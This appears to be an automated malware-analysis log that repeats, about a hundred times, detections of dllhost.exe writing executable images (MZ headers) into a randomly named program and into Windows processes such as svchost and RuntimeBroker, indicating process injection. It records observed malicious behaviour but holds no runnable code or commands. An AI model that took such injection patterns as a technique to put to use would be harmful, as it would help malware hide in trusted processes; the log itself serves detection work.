Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
